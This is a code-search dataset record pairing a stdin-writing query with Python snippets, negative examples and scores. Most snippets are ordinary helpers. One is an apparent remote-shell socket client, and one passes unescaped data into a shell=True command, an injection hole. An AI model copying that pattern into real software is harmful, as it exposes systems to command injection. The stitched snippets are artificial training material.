self.status_code >= 200 and self.status_code < 300 and self.uuid", "def ok(*args):", "def exit_success():\n\tglobal state\n\tprint \"EXIT SUCCESS\"\n\tstate += 2 # increment state to 10", "def _fake_next_op(self, context, message, dry_run=False):\r\n if context.channel in self._fake_ops:\r\n channel = context.channel\r\n if len(self._fake_ops[channel]) > 0:\r\n if \"on_message\" not in self._fake_ops[channel][0] \\\r\n or self._fake_message_compare(self._fake_ops[channel][0][\"on_message\"], message):\r\n if \"after\" in self._fake_ops[channel][0] and self._fake_ops[channel][0][\"after\"] > 0:\r\n if dry_run:\r\n return False\r\n self._fake_ops[channel][0][\"after\"] -= 1\r\n return False\r\n if dry_run:\r\n return True\r\n instruction = self._fake_ops[channel].pop(0)\r\n if len(self._fake_ops[channel]) == 0:\r\n del self._fake_ops[channel]\r\n vprint(\"{}: faking reply\".format(self.name))\r\n reply = instruction[\"reply\"]\r\n if \"execute\" in instruction and instruction[\"execute\"] == True:\r\n result = {}\r\n if instruction[\"on_success\"]:\r\n result[\"on_success\"] = reply\r\n if instruction[\"on_failure\"]:\r\n result[\"on_failure\"] = reply\r\n return result\r\n if reply.success:\r\n self._worker.reply(context, PlatformMessage.success(reply.retval, reply.retval_name))\r\n else:\r\n self._worker.reply(context, PlatformMessage.failure(reply.state, reply.errcode))\r\n return True\r\n else:\r\n # TODO: Shouln't be here actually. Raise error!\r\n del self._fake_ops[channel]\r\n return False", "def reply_with_code(self, code: int) -> None:", "def reply_is_success(reply: dict):\n return (\n reply\n and type(reply) is dict\n and reply.get(\"status\", None)\n and reply[\"status\"] == \"success\"\n )", "def answer(self) -> bool:", "def _success(self, msg=\"\"):\n if msg:\n self.result[\"message\"] = msg\n self.module.exit_json(**self.result)", "def ok(self):\n return self._code == 0", "def ok(self):\n return self.status_code == 250", "def success(self, cb: CircuitBreaker) -> None:", "def handle_success(self, err, msg):\n # FIXME: Can we verify that it is actually garbage collected?\n assert \"GOOD:\" in msg.value().decode('utf-8')\n assert err is None\n assert False, \"should never come here\"", "def func_case(self):\n test.success(\"\")", "def was_successful(self):\n return self._build_proto.status == common.SUCCESS", "def __bool__(self):\n return self.is_successful", "def success(elements, action=None):\n return Result(True, elements, action)", "def is_successful(self):\n\t\treturn randint(1, 100) <= self.get_success_probability()", "def success(self, message, *args, **kwargs):\n self.counters[\"success\"] += 1\n self._write(message.format(*args, **kwargs), SUCCESS)", "def successful_response(self):\n self._requests_successful += 1", "def resp200(msg):\n return Resp({'message':msg, 'success':True})", "def kinbot(self):\n self.success = False", "def check_response(rv):\n if rv != 'OK':\n print \"No message found\"\n return False\n return True", "def is_success(self):\r\n if self.status_code < 400:\r\n return True\r\n return False", "def is_success(self):\r\n if self.status_code < 400:\r\n return True\r\n return False", "def _is_successful(response) -> bool:\n return response.status_code == 200", "def is_ok(r) -> bool:\n\tif r.status_code == 200:\n\t\treturn True", "def success_message_code(response_obj, check_util=None):\n if check_util:\n success = check_util(response_obj)\n phrase, status = assign_message_code(success)\n else:\n success = True\n phrase, status = response_obj.reason, response_obj.status_code\n return success, phrase, status", "def _response_success(self, msg, msgID):\r\n if not self._status:\r\n # Can not help it if the response takes some time and in the mean\r\n # time the interface is disabled; therefore, don't raise an error\r\n # instead just skip sending the response\r\n return\r\n\r\n self._conn.sendMessage(self._iTag, self._clsName, msg, msgID)", "def post_craft(self, craft_result, **kwargs):\n if craft_result:\n self.msg(self._format_message(self.success_message))\n elif self.failure_message:\n self.msg(self._format_message(self.failure_message))\n\n if craft_result or self.consume_on_fail:\n # consume the inputs\n for obj in self.validated_consumables:\n obj.delete()\n\n return craft_result", "def send_message(self):\r\n return \"success\"", "def has_success(self) -> bool:\n return self._has_success", "def ReturnCode(rc):\r\n return _hiew.ReturnCode(rc)", "def checkSelfReply(body):\n return 'WHAT IS MY PURPOSE' in body", "def assign_message_code(success: bool):\n return (HTTPStatus.OK.phrase, HTTPStatus.OK) if success\\\n else (HTTPStatus.INTERNAL_SERVER_ERROR.phrase, HTTPStatus.INTERNAL_SERVER_ERROR)", "def testReturn(self):\n\t\tx = BaseAction('x')\n\t\tself.failUnless(x.record() == x)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.modification_list\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(ModalityPerformedProcedureStep)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_SET, handle)]\n )\n\n ae.add_requested_context(ModalityPerformedProcedureStep)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_set(\n ds, ModalityPerformedProcedureStep, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def update_ret(self, space_no, field_types, key_tuple, op_list):\n d = self.replyQueue.get()\n packet = RequestUpdate(self.charset, self.errors, d._ipro_request_id,\n space_no, Request.TNT_FLAG_RETURN, key_tuple, op_list)\n self.transport.write(bytes(packet))\n return d.addCallback(self.handle_reply, self.charset, self.errors, field_types)", "def OnSuccess(self):\n pass", "def _sendVersion_result (self, (code, data)) :\n\n assert code == \"REPLY_HELLO\"\n\n return data", "def _is_return(self, words):\n if words[0] == 'return':\n if len(words) != 1:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_RETURN command.\".format(self._file_line))\n return True\n else:\n return False", "def execute ( self, cmdstr, rlen, repeats=4, **kwargs ):\n dbg(\"EXECUTE(%s,%d,%d,%s)\\n\" % (s2hex(cmdstr), rlen, repeats, repr(kwargs)))\n built = None\n crcerrors = 0\n for repeat in range(repeats):\n # if repeat>0:\n # trace()\n self.resume()\n self.link.lastchar = \"\"\n dbg(\"EXECUTE: tx(%s) -> \" % (s2hex(cmdstr)))\n self.link.tx(cmdstr)\n self.ncmds += 1\n if rlen == 0:\n return None\n\n if kwargs.has_key('timeout'):\n #\n # Wait for a reply until timeout\n #\n r=\"\"\n t=timer()+kwargs['timeout']\n while len(r) < rlen and timer() < t:\n c=self.link.rx(1)\n if c:\n t=timer()+kwargs['timeout']\n r += c\n # if r!= \"\":\n # break\n # if r==\"\":\n # for i in range(256):\n # self.com.tx('\\n')\n # c = self.com.rx(1)\n # if c=='!':\n # dbg(\"Sent %d \\\\n\\n\" % (i+1))\n # break\n # # raise Exception(\"\\nCOMMAND FAIL: [%s] -> [%s]\\n\" % (s2hex(cmdstr), s2hex(r)))\n # else:\n # # r += self.com.rx(rlen-1)\n # prev=timer()\n # while len(r)<rlen and timer() < t:\n # r += self.com.rx(1)\n # last=timer()\n # if last-prev > 0.001:\n # trace()\n # prev=last\n \n else:\n r = self.link.rx(rlen)\n\n if r:\n dbg(\"%s\\n\" % s2hex(r))\n else:\n dbg(\"no reply\\n\")\n\n if self.link.lastchar != '#':\n dbg(\" COMMAND FAILED\\n\")\n self.ncmdfails += 1\n continue\n\n r = r[:-1]\n if rlen <= 2:\n return r\n else:\n crc = CRC.check(cmdstr+r)\n if crc == 0:\n if built:\n dbg(\"\\nBUILT REPLY: %s:\" % s2hex(built))\n for i in range(rlen-1):\n if built[i] != r[i]:\n dbg(\" #%d\" % i)\n dbg(\"\\nGOOD REPLY: %s\\n\\n\" % s2hex(r))\n return r[:-2]\n dbg(\" CRC ERROR: 0x%04X\\n\" % crc)\n #\n # CRC error, try to correct it.\n #\n # Bytes are transfered least significant bit\n # first. Inaccurate synchronization of the device can lead\n # to the last transmitted bit (msb) of bytes to be\n # defective:\n #\n # * If the device estimated the baudrate a little too\n # high, the host can sample the stop bit (1) instead of\n # the msb. This leads to an error only if the original\n # msb is 0, then it is corrected by setting the msb back\n # to 0. Only bytes whose received msb is high are\n # concerned.\n #\n # * If the device estimated the baudrate a little too low,\n # the host can sample bit b6 instead of the msb. This\n # leads to an error only if the original b6 and b7 (msb)\n # are different, then it is corrected by setting b7 to\n # the opposite of b6.\n #\n\n crcerrors += 1\n self.ncrcerrors += 1\n\n if len(r) != rlen-1:\n # dbg(\" BAD REPLY #%d: %s\\n\" % (repeat,s2hex(r)))\n continue\n\n if not built:\n #\n # Display a rule to make finding bytes easier\n #\n dbg(\"\\n \")\n for i in range(rlen-1):\n dbg(\" %02d\" % i)\n dbg(\" BAD REPLY #%d: %s\\n\" % (repeat,s2hex(r)))\n\n updated = False\n if not built:\n built = r\n updated = True\n else:\n #\n # Try to build the correct frame with bytes whose b7,b6\n # bits are different\n #\n positions=[]\n for p in range(rlen-1):\n if ( (ord(built[p]) & 0xC0) == 0xC0\n or (ord(built[p]) & 0xC0) == 0x00 )\\\n and ord(r[p]) != ord(built[p]):\n\n positions.append(p)\n built = built[:p] + r[p] + built[p+1:]\n dbg(\" #%d\" % p)\n updated = True\n if updated:\n # dbg(\"\\nUPDATED BYTES:\")\n # for p in positions:\n # dbg(\" #%d\" % p)\n if CRC.check(cmdstr+built) == 0:\n dbg(\"\\nFRAME FULLY CORRECTED\\n\\n\")\n return built[:-2]\n dbg(\"\\n\")\n\n # Device a little too low?\n # Try setting b7 to the opposite of b6\n #\n if updated:\n for p in range(rlen-1):\n old = ord(built[p])\n if (old & 0xC0) == 0x00 or (old & 0xC0) == 0xC0:\n new = old ^ 0x80\n x = built[:p] + chr(new) + built[p+1:]\n crc = CRC.check(cmdstr+x)\n if crc == 0:\n dbg(\"\\nbyte #%d has been corrected \"\n \"from %02X to %02X\\n\" % (p,old,new))\n return x[:-2]\n\n # s = \"\\nCOMMAND [%s] FAILED.\" % s2hex(cmdstr)\n if len(cmdstr) > 8:\n s = \"\\nCOMMAND [%s ... %s] (%d bytes) FAILED.\" \\\n % (s2hex(cmdstr[:4]), s2hex(cmdstr[-2:]), len(cmdstr))\n else:\n s = \"\\nCOMMAND [%s] FAILED.\" % s2hex(cmdstr)\n if crcerrors > 3:\n s += _(\"\\nMany CRC unrecoverable errors detected. Your baudrate setting (%d) \"\\\n \"may be too high for the device.\\n\" % self.link.serial.baudrate)\n die(s)", "def __bool__(self) -> bool:\n return self.return_code == 0", "def __bool__(self) -> bool:\n return self.return_code == 0", "def __bool__(self) -> bool:\n return self.return_code == 0", "def test_success(self):\n\n @sync_performer\n def succeed(dispatcher, intent):\n return intent\n\n dispatcher = lambda _: succeed\n result = sync_perform(dispatcher, Effect(\"foo\"))\n self.assertEqual(result, \"foo\")", "def succeed(self) -> bool:\n return self.errorCode is None or len(self.errorCode) < 1", "def success(self):\n return self._success", "def get_success_message(cls, args, results):\n return cls.success_message", "def isOk(self):\n return self._isOk", "def smart_run(self, dry_run=False, silent=False,\n out_extension='out',\n success_string=\"Have a nice day.\",\n success_fct=None,\n ignore_meta=False,\n use_CCParser=True):\n origin = os.getcwd()\n if not self.is_successful(out_extension=out_extension,\n success_string=success_string,\n success_fct=success_fct,\n ignore_meta=ignore_meta,\n use_CCParser=use_CCParser):\n # change directory to wdir (submit needs to be run from there)\n os.chdir(self.meta[\"wdir\"])\n self.run(dry_run=dry_run, silent=silent)\n # take care of new status information\n self.meta[\"status\"] = 'PENDING'\n self.save_meta()\n # change back to origin folder\n os.chdir(origin)", "def action_success(result):\n response = {\n ControllerConstants.ACTIVITY_STATUS: ControllerConstants.SUCCESS_STATUS,\n }\n if result:\n response[ControllerConstants.RESPONSE] = result\n return create_response(response)", "def retry(self):\n # XXX: check whether it is possible to distingish \n # between the error conditions and set meaningfull exitcode\n return False", "def testRecord(self):\n\t\tfca = FunctionCallAction(('key',), 'c', 'd', 'ret')\n\t\tself.failUnless(fca.record() == 'ret')", "def passed(self):\n if self.result == RESULT_PASS:\n return True\n\n return False", "def determine_exit_code(self) -> int:", "def get_exit_code(self):", "def send_message_success(self, sn: TransactionID, destination: tuple, source: tuple):\n pass", "def _default_is_success(status_code):\n\n return status_code >= 200 and status_code < 300", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(BasicFilmSession)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_DELETE, handle)]\n )\n\n ae.add_requested_context(BasicFilmSession)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n status = assoc.send_n_delete(BasicFilmSession, \"1.2.840.10008.5.1.1.40.1\")\n assert status.Status == 0x0000\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def success():\n sys.stdout.write('%s[ pass ]%s\\n' % (colors.GREEN, colors.RESET))", "def isfailure(self):\n\n return self.proc.returncode != 0", "def is_pipe_success(self, pipe_res):\n return reduce(\n lambda x, y: bool(x) & bool(y),\n pipe_res)", "def _validate_post(self, value, name, result):\n return result", "def respond(cmd,t,p):\n\tt.write(cmd)\n\treturn wait(t,p)" ]
[ "0.63443524", "0.58786947", "0.58400226", "0.58400226", "0.58263105", "0.58013785", "0.57647425", "0.57602125", "0.5742646", "0.57332826", "0.5728719", "0.5713388", "0.5706354", "0.5559924", "0.5558752", "0.5544535", "0.55265385", "0.55088335", "0.5459527", "0.5437543", "0.54271376", "0.5426846", "0.54181755", "0.54091865", "0.5402995", "0.5401155", "0.5393572", "0.53782433", "0.53753966", "0.537299", "0.5353333", "0.53497726", "0.53237605", "0.5322524", "0.53204346", "0.53204066", "0.531843", "0.53113306", "0.5300499", "0.529691", "0.52931345", "0.52611256", "0.524945", "0.5241767", "0.523285", "0.5227628", "0.5224248", "0.52233267", "0.5221205", "0.52178365", "0.52134615", "0.5213157", "0.52124906", "0.52104926", "0.5206622", "0.52047867", "0.5202804", "0.5199894", "0.5196887", "0.5196887", "0.51948535", "0.5191946", "0.5183715", "0.51659876", "0.51628864", "0.5157835", "0.5157183", "0.51540375", "0.515362", "0.5141398", "0.51389194", "0.5132584", "0.5129415", "0.5123684", "0.5118379", "0.51164997", "0.5110968", "0.5110064", "0.5110064", "0.5110064", "0.510931", "0.5076756", "0.5068761", "0.50653976", "0.50540495", "0.50520945", "0.5047503", "0.5039637", "0.5033777", "0.5032815", "0.5028121", "0.50217015", "0.50108826", "0.50090235", "0.500854", "0.50020915", "0.499289", "0.49926358", "0.49914607", "0.49910995" ]
0.56434834
13
Send data to the process's stdin
def sendData (self, data) : assert len(data) <= 255 return self.sendCommand("CMD_IN_DATA_STDIN", data).addCallback(self._sendData_result)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write( self, data ):\n os.write( self.stdin.fileno(), data )", "def stdin_read(self, data):\n self.write_master(data)", "def send_data(sock):\n while True:\n data = sys.stdin.readline()\n sock.send(data.encode())", "def send_msg(self, msg):\n self.proc.stdin.write(msg)", "def send_stdin(self, s_bytes):\n self._proc.stdin.write(s_bytes)\n self._proc.stdin.flush()", "def send(self, data):\n\n if self.subprocess.poll() is None:\n try:\n self.subprocess.stdin.write(\"{}\\n\".format(str(data).encode()))\n except IOError as e:\n logging.warning(\"IPC: Failed to send data! IOError: {}\".format(e))\n\n logging.debug(\"IPC: {}\".format(str(data)))\n else:\n logging.error(\"IPC: Process is dead! Poll: {}\".format(self.subprocess.poll()))", "def write( shell, data ):\n #print 'cmd: ' + data\n global waiting\n os.write( shell.stdin.fileno(), data )\n waiting = True", "def _direct_stdin_writer(self, msg):\n with self._stdin_lock:\n msg += \"\\n\"\n m = msg.encode(\"utf-8\")\n self._log(\"raw\", \"write to stdin : {0}\".format(m))\n self._popen.stdin.write(m)", "def stdin(self):\n pass", "def send(self, sendstring):\n self.__proc.stdin.write(sendstring+'\\n')", "def _on_stdin_read(self, data):\n if not self.opts[\"udp\"]:\n self.fire(write(data))\n else:\n self.fire(write((self.host, self.port), data))", "def _stdin_writer(self):\n self._is_launched.wait()\n while True:\n message = self.stdin_queue.get()\n if message is None or self._is_stopping or not self._is_running.is_set():\n if message is not None:\n log.debug(\"Ignore {0} on process {1} because it's stopped\".format(message, self.name))\n break\n self._direct_stdin_writer(message)\n self._log(\"raw\", \"write to stdin : {0}\".format(message.encode(\"utf-8\")))", "def call_and_feed(cmd, data):\n p = Popen(cmd, shell=True, stdin=PIPE)\n p.stdin.write(data)\n p.stdin.close()\n return p.wait()", "def sendCommand(self, command):\n if(self.process is not None):\n try:\n self.process.stdin.write(command + '\\n')\n except:\n pass", "def write(self, command):\n self.stdin_stream.write(command)\n self.stdin_stream.flush()", "def console(self, message):\n if self.proc is None or self.proc.poll() is not None:\n return\n message = message.split('\\n')[0] + '\\n'\n self.proc.stdin.write(message.encode())\n self.proc.stdin.flush()", "def sendProcessStdin(self, name, chars):\r\n self._update('sendProcessStdin')\r\n\r\n if isinstance(chars, unicode):\r\n chars = chars.encode('utf-8')\r\n\r\n if not isinstance(chars, basestring):\r\n raise RPCError(Faults.INCORRECT_PARAMETERS, chars)\r\n\r\n group, process = self._getGroupAndProcess(name)\r\n\r\n if process is None:\r\n raise RPCError(Faults.BAD_NAME, name)\r\n\r\n if not process.pid or process.killing:\r\n raise RPCError(Faults.NOT_RUNNING, name)\r\n\r\n try:\r\n process.write(chars)\r\n except OSError as why:\r\n if why.args[0] == errno.EPIPE:\r\n raise RPCError(Faults.NO_FILE, name)\r\n else:\r\n raise\r\n\r\n return True", "def test_pipe_to_stdin(self):\n original_stdin = sys.stdin\n with self.pipe_to_stdin() as input:\n self.assertNotEqual(original_stdin, sys.stdin)\n input.write(\"Hello world!\\n\")\n self.assertEqual(sys.stdin.readline(), \"Hello world!\\n\")\n self.assertEqual(original_stdin, sys.stdin)", "def put(self, value):\n self.stdin.put(value)", "def _replace_stdin(self, text):\n orig = sys.stdin\n sys.stdin = StringIO(text)\n yield\n sys.stdin = orig", "def writePipe(self, data):\n if not '[Press a key]' in data:\n subprocess.Popen(\"echo \" + str(data) + \" > /tmp/g13-0\", shell=True)", "def stdin_thread(self):\n while True:\n if not self.is_running():\n time.sleep(0.1)\n continue\n msg = self._stdin_queue.get()\n if msg is None:\n break # Ask to stop\n self._say(msg)", "def rshell(self, chan):\n logging.debug(\"\")\n logging.debug(\"************************************************************\")\n import select\n import termios\n import tty\n import socket\n from paramiko.py3compat import u\n oldtty = termios.tcgetattr(sys.stdin)\n try:\n tty.setraw(sys.stdin.fileno())\n tty.setcbreak(sys.stdin.fileno())\n chan.settimeout(0.0)\n while True:\n r, w, e = select.select([chan, sys.stdin], [], [])\n if chan in r:\n try:\n x = u(chan.recv(1024))\n if len(x) == 0:\n sys.stdout.write('\\n\\n')\n break\n sys.stdout.write(x)\n sys.stdout.flush()\n except socket.timeout:\n pass\n if sys.stdin in r:\n x = sys.stdin.read(1)\n if len(x) == 0:\n break\n chan.send(x)\n finally:\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)", "def get_stdin(self) :\n\t\tif self.__stdin is not None :\n\t\t\t# probably no flush\n\t\t\treturn self.__stdin.getvalue()", "def run(self):\n def target():\n # Pass these inputs to STDIN with delays\n for i in self.delayed_inputs:\n if type(i) is int or type(i) is float:\n time.sleep(i)\n elif type(i) is bytes:\n try:\n self.process.stdin.write(i) \n except IOError as e:\n lg.info(\n \"Input: {} failed to write to stdin due to\\n{}\".format(i, e)\n )\n break\n if self.disable_communicate:\n self.process.wait()\n else:\n self.stdout_res, self.stderr_res = self.process.communicate(\n input=self.inputs)\n\n try:\n self.process = Popen(self.command, stdin=self.stdin,\n stdout=self.stdout, stderr=self.stderr,\n start_new_session=True, cwd=self.cwd, env=self.env)\n except OSError:\n lg.error(\"Couldn't Popen command {}\".format(self.command))\n raise\n self.thread = Thread(target=target)\n self.thread.start()", "def monitor_stdin():\n while len(sys.stdin.read(1024)):\n pass\n if args.multi:\n client_monitor.notify_parent_exit()\n else:\n trigger_exit(ExitMode.PARENT)", "def master_read(self, data):\n self.write_stdout(data)", "def communicate(host, port):\n s = socket.socket()\n s.connect((host, port))\n payload = sys.stdin.read().encode()\n s.sendall(payload)\n s.shutdown(socket.SHUT_WR)\n\n output = []\n while True:\n read = s.recv(READ_SIZE)\n if read:\n output.append(read.decode())\n else:\n break\n return ''.join(output)", "def parse_stdin(self, data):\n return data", "def write(self, command):\n # Write command in bytes plus newline then flush.\n self.proc.stdin.write(bytes(command + \"\\n\", 'ascii'))\n self.proc.stdin.flush()\n\n self.genout()", "def _queuing_input(procQueue, stdin_fd, query, valid, default):\n sys.stdin = os.fdopen(stdin_fd)\n procQueue.put(_get_user_input(query, valid, default))", "def posix_shell(chan):\n import select\n \n oldtty = termios.tcgetattr(sys.stdin)\n try:\n tty.setraw(sys.stdin.fileno())\n tty.setcbreak(sys.stdin.fileno())\n chan.settimeout(0.0)\n\n while True:\n r, w, e = select.select([chan, sys.stdin], [], [])\n if chan in r:\n try:\n x = chan.recv(1024)\n if len(x) == 0:\n print '\\r\\n*** EOF\\r\\n',\n break\n sys.stdout.write(x)\n sys.stdout.flush()\n except socket.timeout:\n pass\n if sys.stdin in r:\n x = sys.stdin.read(1)\n if len(x) == 0:\n break\n chan.send(x)\n\n finally:\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)", "def on_stdin_send(self, debug_console, message, status):\r\n raise NotImplementedError(\r\n 'You must implement \"on_stdin_send()\" to use the \"DebugListener\"'\r\n 'class.')", "def read(self):\n global ALIVE\n line = sys.stdin.readline()\n if line:\n self.datalines.append(line.rstrip())\n else:\n ALIVE = False", "def _handle_stdin(self, line):\r\n return input(line.replace(STDIN_PROMPT, \"\"))", "def reader_thread(self, q):\r\n try:\r\n with self.process.stdout as pipe:\r\n for line in iter(pipe.readline, b''):\r\n q.put(line)\r\n finally:\r\n q.put(None)", "def _posix_shell(cls, chan, user_input, iotimeout, iodelay):\n timeout = 60 # 1 mins , only its only applicable to cmcli ssl commands\n result = ''\n input = list(user_input)\n input_end = 1\n try:\n chan.settimeout(iotimeout)\n input.reverse()\n start_time = time.time()\n\n while True:\n # we dont need this hack this is only happenning for ssl tests\n log.debug('Running select')\n r, w, e = select.select([chan, sys.stdin], [], [], 5)\n log.debug('select done')\n\n log.debug('r: %s' % repr(r))\n log.debug('w: %s' % repr(w))\n log.debug('e: %s' % repr(e))\n\n if chan in r:\n log.debug('rlist: wait until ready for reading')\n try:\n log.debug('channel receiving data')\n\n # Start with something\n x = \"DO IT\"\n while len(x) > 0:\n\n # Got stuff. Print it\n time.sleep(iodelay)\n log.debug('get some data')\n x = chan.recv(20480)\n last_prompt = x\n result += x\n log.debug('data received. Write it to stdout')\n sys.stdout.write(x)\n log.debug('flushing stdout')\n sys.stdout.flush()\n\n # We've sent it all. Let's get out\n if len(input) == input_end:\n log.debug('NOTHING LEFT TO SEND')\n\n # Program exited too soon\n if chan.exit_status_ready():\n log.warn('Hit exit status ready sooner than expected')\n chan.send('^D\\n')\n raise\n\n except socket.timeout:\n log.debug('All stdout exhausted')\n if len(input) > input_end:\n x = input.pop()\n log.debug('SENDING to input stream: %s' % x)\n chan_in = '%s' % x\n chan.send(chan_in)\n result += chan_in\n else:\n if chan.exit_status_ready():\n log.info('Program ready to exit')\n break\n\n # Keep reading for cmcli commands since we need to\n # wait until we get back to the prompt\n pass\n\n if not r:\n # FIXME: I think we want to inspect the the last prompt.\n # If it was input, we should probably attempt another select\n # if we are running a cmcli command\n log.debug(\"Nothing to send or unexpected prompt. \" +\n \"Prompt was: %s\" % last_prompt)\n raise\n\n finally:\n\n # Assume the last input is logout\n x = input.pop()\n log.debug('SENDING logout to input stream: %s' % x)\n chan_in = '%s\\n' % x\n chan.send(chan_in)\n result += chan_in\n\n log.debug('Trying to get exit status for command')\n exit_status = chan.recv_exit_status()\n log.debug('Got exit status for command: %s', exit_status)\n x = chan.recv(20480)\n log.debug(\"Last data received: %s\" % x)\n result += x\n sys.stdout.write(x)\n sys.stdout.flush()\n log.debug(\"return from posix shell\")\n return result, exit_status", "def send_command(self, data):\n try:\n self.write(data)\n reply = self.read_line()\n \n if reply == \"{}\":\n pass\n else:\n print \"send_command: received bad reply %s\" % (reply)\n sys.exit(1)\n except Exception:\n raise", "def push_data(self, data):\n self.incoming.write(data)", "def write(self):\n\n while self.dowrite:\n data = sys.stdin.readline()\n if (self.algo == \"rsa\"):\n data = self.ras_encrypt(data)\n if (self.algo == \"des\"):\n data = self.des_encrypt(data)\n if (self.algo == \"3des\"):\n data = self.triple_des_encrypt(data)\n if (self.algo == \"aes\"):\n data = self.aes_encrypt(data)\n self.conn.send(data)\n\n if (data.strip() == self.exitcode):\n self.conn.shutdown(socket.SHUT_RDWR)\n self.conn.close()\n self.dowrite = False", "def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)", "def prog_input(self, put_idx: int) -> None:\n self.write(int(self.stdin.pop()), put_idx)", "def on_data(self, data):\n if data is not None:\n # Send the data to the parent process\n logging.debug('Received raw data : ' + str(data))\n self.mp_queue.put(data)", "def keyboard_process(pipe):\n keyboard = WindowsKeyboardListener(pipe)\n keyboard.listen()", "def test23a(self):\n self.spawn(\"./binary\").stdin(\"1\").stdin(\"12\").stdin(\"0\").stdin(\"0\").stdin(\"0\").stdin(\"1\").stdin(\"0\").stdin(\"1\").stdin(\"1\").stdin(\"1\").stdout(\"23\\n\").exit(0)", "def interact(self):\n print('Ready to interact on socket connected with {}.'.format(self.remote_addr))\n try:\n # get initial input from user\n print('Enter input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n while True:\n if data.startswith('exit'):\n print('[*] Closing remote shell.')\n self.close()\n break\n # wait for response from target host\n recv_len = 1\n response = ''\n while recv_len:\n data = self.remote_socket.recv(4096)\n recv_len = len(data)\n response += data.decode()\n if recv_len < 4096:\n break\n print(response)\n # get further input from user\n print('Enter further input or press CTRL-D for no input.')\n data = sys.stdin.readline()\n self.remote_socket.sendall(data.encode())\n except Exception as e:\n print(e)\n print('[*] Closing remote shell.')\n self.close()", "def run(self, arguments=None, debug=False):\n\n # kill the child process if we receive a terminate signal\n def terminate_child_process(child, signum, frame):\n try:\n if child and signum != signal.SIGINT:\n child.terminate()\n child.wait()\n finally:\n sys.exit()\n\n # poll the pty for available data to read, then push to a queue and signal ready\n def produce_queue(queue, master_fd, slave_fd, evt, proc):\n with os.fdopen(master_fd, 'rb', 0) as task_stream:\n while 1:\n ready = select.select([master_fd], [], [], 0)[0]\n\n # exit if our process has terminated and no more input\n if not ready and proc.poll() is not None:\n os.close(slave_fd)\n evt.set()\n break\n\n if master_fd in ready:\n # POSIX.1 requires PIPE_BUF to be at least 512 bytes, but Linux uses 4096 bytes\n data = os.read(master_fd, 4096)\n\n if not data:\n # reached EOF, signal data ready in case the queue is not empty, then exit\n evt.set()\n break\n else:\n # put data in the queue and signal the consumer thread\n queue.put(data)\n evt.set()\n\n # wait for ready signal, then read data from queue and save to a buffer\n # once the buffer contains an end of line, send that to a callback if defined,\n # then send the line to a file for later processing\n def consume_queue(queue, filename, evt, proc, callback=None):\n streambuffer = []\n with open(filename, 'w+') as fileobj:\n while 1:\n # wait for a signal at most one second at a time so we can check the child process status\n evt.wait(1)\n if queue.empty() and proc.poll() is not None:\n # make sure the last part of the buffer is written out\n if streambuffer:\n if callback:\n callback(streambuffer[0])\n\n fileobj.write(streambuffer[0])\n fileobj.flush()\n break\n elif queue.empty():\n # the queue is empty, but our child process has not exited yet, so data may show up still\n continue\n\n data = queue.get_nowait()\n streambuffer.append(data)\n queue.task_done()\n\n # As soon as we see an end of line from the stream, we should write.\n # Since we could receive many lines per queue chunk, we want to pass\n # a line at a time to our callback.\n if '\\n' in data:\n merged = \"\".join(streambuffer)\n lines = merged.split('\\n')\n\n if len(lines) > 1 and '\\n' not in lines[-1]:\n streambuffer = [lines[-1]]\n lines.pop()\n else:\n streambuffer = []\n\n if callback:\n for x in lines:\n if not x:\n continue\n callback(x)\n\n fileobj.write(\"\".join(lines))\n fileobj.flush()\n\n command_list = self._build_command_list(arguments,debug)\n\n self.logger.info(\"Executing {0}\".format(\" \".join(command_list)))\n\n stdout_name = 'task_stdout_{}'.format(datetime.datetime.utcnow().isoformat())\n stderr_name = 'task_stderr_{}'.format(datetime.datetime.utcnow().isoformat())\n\n stderr = open(stderr_name, 'w+')\n\n # Use pty to provide a workaround for buffer overflow in stdio when monitoring stdout\n master_stdout_fd, slave_stdout_fd = pty.openpty()\n #master_stderr_fd, slave_stderr_fd = pty.openpty()\n #task = subprocess.Popen(command_list, stdout=slave_stdout_fd, stderr=slave_stderr_fd, close_fds=True)\n task = subprocess.Popen(command_list, stdout=slave_stdout_fd, stderr=stderr.fileno(), close_fds=True)\n\n # force termination signal handling of the child process\n signal_handler = functools.partial(cleanup, task)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n stdout_queue = Queue.Queue()\n stdout_data_ready = threading.Event()\n\n t1 = threading.Thread(target=produce_queue, args=(stdout_queue, master_stdout_fd, slave_stdout_fd, stdout_data_ready, task))\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=consume_queue, args=(stdout_queue, stdout_name, stdout_data_ready, task, self.callback))\n t2.daemon = True\n t2.start()\n\n #stderr_queue = Queue.Queue()\n #stderr_data_ready = threading.Event()\n\n #t3 = threading.Thread(target=produce_queue, args=(stderr_queue, master_stderr_fd, slave_stderr_fd, stderr_data_ready, task))\n #t3.daemon = True\n #t3.start()\n\n #t4 = threading.Thread(target=consume_queue, args=(stderr_queue, stderr_name, stderr_data_ready, task))\n #t4.daemon = True\n #t4.start()\n\n task.wait()\n\n t1.join()\n t2.join()\n 